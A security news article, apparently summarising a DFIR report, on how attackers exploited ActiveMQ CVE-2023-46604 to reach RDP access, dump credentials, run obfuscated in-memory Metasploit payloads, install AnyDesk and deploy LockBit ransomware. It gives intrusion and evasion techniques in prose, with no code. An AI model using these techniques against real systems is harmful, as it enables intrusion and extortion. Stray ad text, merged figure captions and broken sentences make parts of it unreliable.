Threat Actors Exploit Apache ActiveMQ Server Vulnerability to Gain RDP Access and Deploy LockBit Ransomware

Threat actors have actively exploited a critical vulnerability in Apache ActiveMQ, resulting in the full deployment of the LockBit ransomware throughout an enterprise network. Using the ActiveMQ messaging broker's remote code execution vulnerability, CVE-2023-46604, the attackers gained access to an exposed Windows server and used Remote Desktop Protocol to encrypt systems. This process took about 19 calendar days from the time of initial access to complete encryption.

Learn more about security threat analysis and computer security consulting. Managers of passwords The attack started in the middle of February 2024 when a threat actor sent an Apache ActiveMQ server that was open to the public a specially constructed OpenWire command.

The exploit made the server load a remote Java Spring XML configuration file that told the compromised host to use the Windows CertUtil tool to download a Metasploit stager. Following execution, the stager established a command-and-control channel to a server under the control of the attacker located at IP address 166.62.100[.].52. During Rounds 1 and 2, LSASS Credential Dumping Activity Was Seen in Sysmon Logs (Source: The DFIR Report) On day 18, the attackers came back and used the service account they had stolen to remotely launch services and execute Metasploit payloads on several servers and domain controllers.

String concatenation, Base64 encoding, and gzip compression were used in combination to obfuscate the PowerShell commands that carried those payloads.

Following decoding, the shellcode used VirtualAlloc to allocate memory regions, VirtualProtect to change their protection attribute to executable, and then spawned a thread to run the injected payload in-memory. This technique is frequently used to prevent signature-based endpoint detection. This activity was detected and stopped on hosts with Microsoft Defender installed; unprotected systems were completely compromised.

Installing AnyDesk Silently and Connecting C2 to 166.62.100 []52 (Source: The DFIR Report) The attackers covertly installed in order to hide their tracks and keep a foothold. AnyDesk is configured as an auto-start service on the beachhead host.